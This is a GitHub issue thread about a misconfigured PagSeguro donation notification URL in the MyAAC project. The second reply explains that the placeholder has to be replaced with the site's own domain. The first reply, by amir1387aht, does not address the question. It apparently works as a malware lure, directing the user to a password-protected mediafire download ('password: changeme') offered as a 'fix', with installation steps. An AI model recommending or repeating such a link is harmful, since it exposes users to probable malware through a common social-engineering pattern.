### ISSUE TITLE
PagSeguro config

### ISSUE THREAD

**Issue by lehmartins17** [opentibiabr/myaac#117]
### Priority

Missing Content

### Area

Plugins, System

### What is missing?

In PagSeguro plugin, AFTER config have this error: [HTTP 400] - BAD_REQUEST 0 [10044] - Invalid value for notification URL : https://YOUR_SITE/payments/donate.php.

This YOUR_SITE modify where?

Please help with the issue.

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by elsongabriel** [comment]
Think with me. if your site calls: `myot.com`
you need to use:
`https://myot.com/payments/donate.php`

this URL is mandatory because pagseguro will return payment updates to your server.
